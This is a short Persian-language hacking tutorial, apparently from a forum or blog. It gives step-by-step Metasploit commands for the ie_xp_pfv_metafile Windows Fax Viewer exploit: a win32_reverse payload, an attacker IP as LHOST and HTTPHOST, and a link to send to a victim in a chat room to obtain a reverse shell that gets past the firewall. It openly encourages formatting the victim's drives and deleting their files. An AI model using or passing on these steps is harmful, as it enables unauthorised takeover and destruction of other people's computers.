در متدي جديد که با باگ موجود در Windows Fax Viewer کار مي کند . شما لينکي براي قرباني در چت روم مي فرستيد و بعد از کليک کردن آن لينک توسط قرباني به شما از وي Shell ( قابليت کنترل کامل کامپيوتر وي) ميگيريد نوع Shell در اين روش از نوع Reverse مي باشد و فابليت عبور از ّFirewall را دارا ست .ابزار لازم در اين کار همان Metasploit است که مجموعه باگ هاو ابزار هاي نفوذ مي باشد لينک دريافت Metasploit framework-2.5 - توجه : اگر قبلآ نسخه Metasploit framework-2.4 را دريافت کرده ايد اين باگ هنوز به آن اضافه نشده و شما بايستي در پوشه برنامه MSFupdate را بزنيد تا باگ هاي جديد مانند ie_xp_pfv_metafile به آن اضافه شود. براي کنترل صحت update مي توانيد بعد از اجراي برنامه دستور show exploits را بزنيد و ليست باگ ها را مشاهده و با دستور use از آن ها استفاده کنيد بنابراين تايپ مي کنيد use ie_xp_pfv_metafile حال شما اين exploit را اجرا کرده ايد و بايستي يک سري مقادير را به برنامه بدهيد مانند ip شما و پورت کاربردي . نوع سيستم عامل قرباني . نوع payload (ارتباط ) . دراين با فرض اينکه ip من
http://217.216.30.40 باشد به برنامه مقدار دهي ميکنم . بزنيد set TARGET 0 و بعد آن
بزنيد set PAYLOAD win32_reverse و بعد ان
بزنيد set HTTPHOST 217.216.30.40 و بعد آن
بزنيد set LHOST 217.216.30.40
و در آخر بزنيد exploit . حال برنامه يک لينک از ip شما به شما مي دهد که در اينجا به من لينک
http://217.216.30.40:8080 را مي دهد و منتظر ارتباط با قرباني مي ايستد . با کليک قرباني روي اين لينک شما در اين برنامه shell از سيستم وي را مشاهده خواهيد نمود .شما در اين shell قادر به اجراي همه گونه فرمان بر روي سيستم قرباني مي باشيد به طور مثال Format يک درايو و پاک کردن فايل ها توسط دستورات dos. و انگار از سيستم قرباني وارد cmd شده ايد
by 
